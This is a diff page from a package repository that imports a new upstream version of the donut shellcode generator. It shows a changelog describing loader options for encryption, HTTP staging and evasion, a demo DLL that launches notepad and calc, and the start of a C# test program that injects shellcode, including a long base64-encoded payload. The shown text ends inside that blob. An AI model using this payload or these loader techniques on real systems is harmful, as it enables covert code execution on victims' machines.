Codebase list donut-shellcode / a77d707
New upstream version 0.9.3+git20220530.e75bdcd Sophie Brun 1 year, 10 months ago
182 changed file(s) with 27943 addition(s) and 13256 deletion(s). Raw diff Collapse all Expand all
+252
-0
.gitignore less more
0 ## Ignore Visual Studio temporary files, build results, and
1 ## files generated by popular Visual Studio add-ons.
2
3 # User-specific files
4 *.suo
5 *.user
6 *.sln.docstates
7
8 # Build results
9 [Dd]ebug/
10 [Dd]ebugPublic/
11 [Rr]elease/
12 [Rr]eleases/
13 x64/
14 x86/
15 bld/
16 [Bb]in/
17 [Oo]bj/
18 build/
19
20 # Roslyn cache directories
21 *.ide/
22 .vs/
23
24 # MSTest test Results
25 [Tt]est[Rr]esult*/
26 [Bb]uild[Ll]og.*
27
28 # NUnit
29 *.VisualState.xml
30 TestResult.xml
31 nunit-*.xml
32
33 # Build Results of an ATL Project
34 [Dd]ebugPS/
35 [Rr]eleasePS/
36 dlldata.c
37
38 *_i.c
39 *_p.c
40 *_i.h
41 *.ilk
42 *.meta
43 *.obj
44 *.pch
45 *.pdb
46 *.pgc
47 *.pgd
48 *.rsp
49 *.sbr
50 *.tlb
51 *.tli
52 *.tlh
53 *.tmp
54 *.tmp_proj
55 *.log
56 *.vspscc
57 *.vssscc
58 .builds
59 *.pidb
60 *.svclog
61 *.scc
62
63 # Chutzpah Test files
64 _Chutzpah*
65
66 # Visual C++ cache files
67 ipch/
68 *.aps
69 *.ncb
70 *.opensdf
71 *.sdf
72 *.cachefile
73
74 # Visual Studio profiler
75 *.psess
76 *.vsp
77 *.vspx
78
79 # TFS 2012 Local Workspace
80 $tf/
81
82 # Guidance Automation Toolkit
83 *.gpState
84
85 # ReSharper is a .NET coding add-in
86 _ReSharper*/
87 *.[Rr]e[Ss]harper
88 *.DotSettings.user
89
90 # JustCode is a .NET coding addin-in
91 .JustCode
92
93 # TeamCity is a build add-in
94 _TeamCity*
95
96 # DotCover is a Code Coverage Tool
97 *.dotCover
98
99 # NCrunch
100 _NCrunch_*
101 .*crunch*.local.xml
102
103 # MightyMoose
104 *.mm.*
105 AutoTest.Net/
106
107 # Web workbench (sass)
108 .sass-cache/
109
110 # Installshield output folder
111 [Ee]xpress/
112
113 # DocProject is a documentation generator add-in
114 DocProject/buildhelp/
115 DocProject/Help/*.HxT
116 DocProject/Help/*.HxC
117 DocProject/Help/*.hhc
118 DocProject/Help/*.hhk
119 DocProject/Help/*.hhp
120 DocProject/Help/Html2
121 DocProject/Help/html
122
123 # Click-Once directory
124 publish/
125
126 # Publish Web Output
127 *.[Pp]ublish.xml
128 *.azurePubxml
129 # TODO: Comment the next line if you want to checkin your web deploy settings
130 # but database connection strings (with potential passwords) will be unencrypted
131 *.pubxml
132 *.publishproj
133
134 # NuGet Packages
135 *.nupkg
136 # The packages folder can be ignored because of Package Restore
137 **/packages/*
138 # except build/, which is used as an MSBuild target.
139 !**/packages/build/
140 # If using the old MSBuild-Integrated Package Restore, uncomment this:
141 #!**/packages/repositories.config
142 Packages.dgml
143
144 # Windows Azure Build Output
145 csx/
146 *.build.csdef
147
148 # Windows Store app package directory
149 AppPackages/
150
151 # Others
152 sql/
153 *.Cache
154 ClientBin/
155 [Ss]tyle[Cc]op.*
156 ~$*
157 *~
158 *.dbmdl
159 *.dbproj.schemaview
160 *.pfx
161 *.publishsettings
162 node_modules/
163
164 # RIA/Silverlight projects
165 Generated_Code/
166
167 # Backup & report files from converting an old project file
168 # to a newer Visual Studio version. Backup files are not needed,
169 # because we have git ;-)
170 _UpgradeReport_Files/
171 Backup*/
172 UpgradeLog*.XML
173 UpgradeLog*.htm
174
175 # SQL Server files
176 *.mdf
177 *.ldf
178
179 # Business Intelligence projects
180 *.rdl.data
181 *.bim.layout
182 *.bim_*.settings
183
184 # Microsoft Fakes
185 FakesAssemblies/
186
187 # =========================
188 # Operating System Files
189 # =========================
190
191 # OSX
192 # =========================
193
194 .DS_Store
195 .AppleDouble
196 .LSOverride
197
198 # Icon must end with two \r
199 Icon
200
201
202 # Thumbnails
203 ._*
204
205 # Files that might appear on external disk
206 .Spotlight-V100
207 .Trashes
208
209 # Directories potentially created on remote AFP share
210 .AppleDB
211 .AppleDesktop
212 Network Trash Folder
213 Temporary Items
214 .apdisk
215
216 # Windows
217 # =========================
218
219 # Windows image file caches
220 Thumbs.db
221 ehthumbs.db
222
223 # Folder config file
224 Desktop.ini
225
226 # Recycle Bin used on file shares
227 $RECYCLE.BIN/
228
229 # Windows Installer files
230 *.cab
231 *.msi
232 *.msm
233 *.msp
234
235 #OpenCover output
236 coverage.xml
237
238 #Msbuild binary log output
239 output.binlog
240
241 # KDiff3
242 *_BACKUP_*
243 *_BASE_*
244 *_LOCAL_*
245 *_REMOTE_*
246 *.orig
247
248 AkavacheSqliteLinkerOverride.cs
249 NuGetBuild
250 WiX.Toolset.DummyFile.txt
251 GitHubVS.sln.DotSettings
+3
-0
.gitmodules less more
0 [submodule "generators/go-donut"]
1 path = generators/go-donut
2 url = https://github.com/Binject/go-donut
+30
-0
CHANGELOG.md less more
0 # Changelog
1 All notable changes to this project will be documented in this file.
2
3 ## [0.9.3]
4
5 ### Added
6
7 * The -e switch can be used to disable entropy and/or encryption. Options are: 1=none, 2=generate random names, 3=generate random names + use symmetric encryption.
8 * The -z switch tells the builder to compress the input file. 1=none, 2=aPLib. On Windows, a further three algorithms are supported, which are 3=LZNT1, 4=Xpress and 5=Xpress Huffman.
9 * The -f switch specifies the output format for loader. 1=binary, 2=base64, 3=c, 4=ruby, 5=python, 6=powershell, 7=c# and 8=hex. On Windows, Base64 strings are copied to the clipboard.
10 * The -t switch tells the loader to run unmanaged entrypoint for EXE as a thread. This also attempts to intercept exit-related API in Import Address Table by replacing their pointers with the address of RtlExitUserThread.
11 * The -n switch can be used to specify name of module for HTTP staging. If entropy is enabled, this is generated randomly.
12 * The -s switch specifies the HTTP server to download module from.
13 * The -y switch tells loader to create a new thread for the loader and continues executing at a specific address or Original Entry Point (OEP). The address should be provided as a string in hexadecimal format.
14 * The -x switch can be used to specify how loader terminates. 1=exit thread, 2=exit process.
15 * The -p switch is used to specify parameters to .NET method, DLL function or command line for an unmanaged EXE file. Wrap multiple parameters inside quotations.
16 * The -w switch tells the loader to convert parameters to UNICODE before passing to unmanaged DLL function.
17 * C# generator by n1xbyte: https://github.com/n1xbyte/donutCS
18 * Go generator by awgh https://github.com/Binject/go-donut
19
20 ### Changed
21
22 * Command line is no longer parsed using semi-colon or comma as a token. The -p switch now accepts a string with all parameters enclosed in quotation marks. For .NET DLL/EXE, these are separated by the loader using CommandLineToArgvW. For unmanaged DLL, the string is passed to the DLL function without any modification.
23 * The -u switch to specify URL for HTTP stager is replaced with -s switch to prepare for a DNS stager.
24 * The -f switch to specify input file is now used to specify output format of loader.
25
26 ### Removed
27
28 * XSL files are no longer supported.
29 * Code stub for calling DLL function with multiple arguments.
+12
-0
DemoCreateProcess/Class1.cs less more
0 using System.Diagnostics;
1
2 public class TestClass
3 {
4 public static void RunProcess(string path, string path2)
5 {
6 System.Console.WriteLine("[STDOUT] Running {0} and {1}...", path, path2);
7 System.Console.Error.WriteLine("[STDERR] Running {0} and {1}...", path, path2);
8 Process.Start(path);
9 Process.Start(path2);
10 }
11 }
+51
-0
DemoCreateProcess/DemoCreateProcess.csproj less more
0 <Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
1 <PropertyGroup>
2 <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
3 <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
4 <ProjectGuid>{75C4A31E-6E99-4289-8701-EF0B6CD94435}</ProjectGuid>
5 <OutputType>Library</OutputType>
6 <NoStandardLibraries>false</NoStandardLibraries>
7 <AssemblyName>DemoCreateProcess</AssemblyName>
8 <TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
9 <FileAlignment>512</FileAlignment>
10 </PropertyGroup>
11 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
12 <DebugSymbols>true</DebugSymbols>
13 <DebugType>full</DebugType>
14 <Optimize>false</Optimize>
15 <OutputPath>bin\Debug\</OutputPath>
16 <DefineConstants>DEBUG;TRACE</DefineConstants>
17 <ErrorReport>prompt</ErrorReport>
18 <WarningLevel>4</WarningLevel>
19 </PropertyGroup>
20 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
21 <DebugType>pdbonly</DebugType>
22 <Optimize>true</Optimize>
23 <OutputPath>bin\Release\</OutputPath>
24 <DefineConstants>TRACE</DefineConstants>
25 <ErrorReport>prompt</ErrorReport>
26 <WarningLevel>4</WarningLevel>
27 </PropertyGroup>
28 <PropertyGroup>
29 <RootNamespace>DemoCreateProcess</RootNamespace>
30 </PropertyGroup>
31 <ItemGroup>
32 <Reference Include="Microsoft.CSharp" />
33 <Reference Include="System" />
34 <Reference Include="System.Core" />
35 <Reference Include="System.Data" />
36 <Reference Include="System.Data.DataSetExtensions" />
37 <Reference Include="System.Xml" />
38 <Reference Include="System.Xml.Linq" />
39 </ItemGroup>
40 <ItemGroup>
41 <Compile Include="Class1.cs" />
42 </ItemGroup>
43 <ItemGroup>
44 <None Include="Readme.md" />
45 </ItemGroup>
46 <Import Project="$(MSBuildToolsPath)\Microsoft.CSHARP.Targets" />
47 <ProjectExtensions>
48 <VisualStudio AllowExistingFolder="true" />
49 </ProjectExtensions>
50 </Project>
+25
-0
DemoCreateProcess/DemoCreateProcess.sln less more
0 
1 Microsoft Visual Studio Solution File, Format Version 12.00
2 # Visual Studio 15
3 VisualStudioVersion = 15.0.28307.136
4 MinimumVisualStudioVersion = 10.0.40219.1
5 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DemoCreateProcess", "DemoCreateProcess.csproj", "{75C4A31E-6E99-4289-8701-EF0B6CD94435}"
6 EndProject
7 Global
8 GlobalSection(SolutionConfigurationPlatforms) = preSolution
9 Debug|Any CPU = Debug|Any CPU
10 Release|Any CPU = Release|Any CPU
11 EndGlobalSection
12 GlobalSection(ProjectConfigurationPlatforms) = postSolution
13 {75C4A31E-6E99-4289-8701-EF0B6CD94435}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
14 {75C4A31E-6E99-4289-8701-EF0B6CD94435}.Debug|Any CPU.Build.0 = Debug|Any CPU
15 {75C4A31E-6E99-4289-8701-EF0B6CD94435}.Release|Any CPU.ActiveCfg = Release|Any CPU
16 {75C4A31E-6E99-4289-8701-EF0B6CD94435}.Release|Any CPU.Build.0 = Release|Any CPU
17 EndGlobalSection
18 GlobalSection(SolutionProperties) = preSolution
19 HideSolutionNode = FALSE
20 EndGlobalSection
21 GlobalSection(ExtensibilityGlobals) = postSolution
22 SolutionGuid = {3A24F1AC-B24D-4029-9661-05CA11DAFC82}
23 EndGlobalSection
24 EndGlobal
+36
-0
DemoCreateProcess/Properties/AssemblyInfo.cs less more
0 using System.Reflection;
1 using System.Runtime.CompilerServices;
2 using System.Runtime.InteropServices;
3
4 // General Information about an assembly is controlled through the following
5 // set of attributes. Change these attribute values to modify the information
6 // associated with an assembly.
7 [assembly: AssemblyTitle("DemoCreateProcess")]
8 [assembly: AssemblyDescription("")]
9 [assembly: AssemblyConfiguration("")]
10 [assembly: AssemblyCompany("")]
11 [assembly: AssemblyProduct("DemoCreateProcess")]
12 [assembly: AssemblyCopyright("Copyright © 2019")]
13 [assembly: AssemblyTrademark("")]
14 [assembly: AssemblyCulture("")]
15
16 // Setting ComVisible to false makes the types in this assembly not visible
17 // to COM components. If you need to access a type in this assembly from
18 // COM, set the ComVisible attribute to true on that type.
19 [assembly: ComVisible(false)]
20
21 // The following GUID is for the ID of the typelib if this project is exposed to COM
22 [assembly: Guid("4fcdf3a3-aeef-43ea-9297-0d3bde3bdad2")]
23
24 // Version information for an assembly consists of the following four values:
25 //
26 // Major Version
27 // Minor Version
28 // Build Number
29 // Revision
30 //
31 // You can specify all the values or you can default the Build and Revision Numbers
32 // by using the '*' as shown below:
33 // [assembly: AssemblyVersion("1.0.*")]
34 [assembly: AssemblyVersion("1.0.0.0")]
35 [assembly: AssemblyFileVersion("1.0.0.0")]
+39
-0
DemoCreateProcess/Readme.md less more
0 # DemoCreateProcess
1
2 A simple C# program to use as a demo for testing shellcode. It takes two program names (such as notepad.exe,calc.exe) as parameters. You may generate shellcode for it using donut:
3
4 64-bit:
5
6 ```
7 .\donut.exe -i .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p "notepad.exe calc.exe"
8 ```
9
10 32-bit:
11
12 ```
13 .\donut.exe -i -a 1 .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p "notepad.exe calc.exe"
14 ```
15
16 # Building on Linux
17
18 This project can be built on Linux using Mono and xbuild. First, follow the official [instructions](https://www.mono-project.com/download/stable/#download-lin) for install Mono. Then, install `mono-xbuild`.
19
20 To build the project, simply `cd` to its root directory and run:
21
22 ```
23 xbuild
24 ```
25
26 To build in Release mode, run:
27
28 ```
29 xbuild /p:Configuration=Release
30 ```
31
32 If receiving errors about missing dependencies, try specifying the targeted .NET version:
33
34 ```
35 xbuild /p:TargetFrameworkVersion="v4.5"
36 ```
37
38 Once the project has been successfully built, the output DLL may be used as input to the Donut shellcode generator.
+6
-0
DonutTest/App.config less more
0 <?xml version="1.0" encoding="utf-8"?>
1 <configuration>
2 <startup>
3 <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2"/>
4 </startup>
5 </configuration>
+55
-0
DonutTest/DonutTest.csproj less more
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
3 <PropertyGroup>
4 <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
5 <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
6 <ProjectGuid>{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}</ProjectGuid>
7 <OutputType>Exe</OutputType>
8 <RootNamespace>DonutTest</RootNamespace>
9 <AssemblyName>DonutTest</AssemblyName>
10 <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
11 <FileAlignment>512</FileAlignment>
12 <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
13 <Deterministic>true</Deterministic>
14 <TargetFrameworkProfile />
15 </PropertyGroup>
16 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
17 <PlatformTarget>AnyCPU</PlatformTarget>
18 <DebugSymbols>true</DebugSymbols>
19 <DebugType>full</DebugType>
20 <Optimize>false</Optimize>
21 <OutputPath>bin\Debug\</OutputPath>
22 <DefineConstants>DEBUG;TRACE</DefineConstants>
23 <ErrorReport>prompt</ErrorReport>
24 <WarningLevel>4</WarningLevel>
25 </PropertyGroup>
26 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
27 <PlatformTarget>AnyCPU</PlatformTarget>
28 <DebugType>pdbonly</DebugType>
29 <Optimize>true</Optimize>
30 <OutputPath>bin\Release\</OutputPath>
31 <DefineConstants>TRACE</DefineConstants>
32 <ErrorReport>prompt</ErrorReport>
33 <WarningLevel>4</WarningLevel>
34 <Prefer32Bit>false</Prefer32Bit>
35 </PropertyGroup>
36 <ItemGroup>
37 <Reference Include="System" />
38 <Reference Include="System.Core" />
39 <Reference Include="System.Xml.Linq" />
40 <Reference Include="System.Data.DataSetExtensions" />
41 <Reference Include="Microsoft.CSharp" />
42 <Reference Include="System.Data" />
43 <Reference Include="System.Net.Http" />
44 <Reference Include="System.Xml" />
45 </ItemGroup>
46 <ItemGroup>
47 <Compile Include="Program.cs" />
48 <Compile Include="Properties\AssemblyInfo.cs" />
49 </ItemGroup>
50 <ItemGroup>
51 <None Include="App.config" />
52 </ItemGroup>
53 <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
54 </Project>
+31
-0
DonutTest/DonutTest.sln less more
0 
1 Microsoft Visual Studio Solution File, Format Version 12.00
2 # Visual Studio 15
3 VisualStudioVersion = 15.0.28307.136
4 MinimumVisualStudioVersion = 10.0.40219.1
5 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DonutTest", "DonutTest.csproj", "{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}"
6 EndProject
7 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DemoCreateProcess", "..\DemoCreateProcess\DemoCreateProcess.csproj", "{4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}"
8 EndProject
9 Global
10 GlobalSection(SolutionConfigurationPlatforms) = preSolution
11 Debug|Any CPU = Debug|Any CPU
12 Release|Any CPU = Release|Any CPU
13 EndGlobalSection
14 GlobalSection(ProjectConfigurationPlatforms) = postSolution
15 {3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
16 {3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Debug|Any CPU.Build.0 = Debug|Any CPU
17 {3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Release|Any CPU.ActiveCfg = Release|Any CPU
18 {3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Release|Any CPU.Build.0 = Release|Any CPU
19 {4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
20 {4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Debug|Any CPU.Build.0 = Debug|Any CPU
21 {4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Release|Any CPU.ActiveCfg = Release|Any CPU
22 {4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Release|Any CPU.Build.0 = Release|Any CPU
23 EndGlobalSection
24 GlobalSection(SolutionProperties) = preSolution
25 HideSolutionNode = FALSE
26 EndGlobalSection
27 GlobalSection(ExtensibilityGlobals) = postSolution
28 SolutionGuid = {E91D143E-AB90-41D2-942F-D3F1DC8352F3}
29 EndGlobalSection
30 EndGlobal
+12
-0
DonutTest/Hello.cs less more
0 // A Hello World! program in C#.
1 using System;
2 namespace HelloWorld
3 {
4 class Hello
5 {
6 static void Main()
7 {
8 Console.WriteLine("Hello World!");
9 }
10 }
11 }
+149
-0
DonutTest/Program.cs less more
0 /* Author: TheWover
1 Description: Injects shellcode into an arbitrary hardcoded process using native Windows 32 API calls.
2 Last Modified: 03/28/2020
3 */
4 using System;
5 using System.Diagnostics;
6 using System.Runtime.InteropServices;
7
8 namespace ShellcodeTest
9 {
10 public class Program
11 {
12 static string x64 = @"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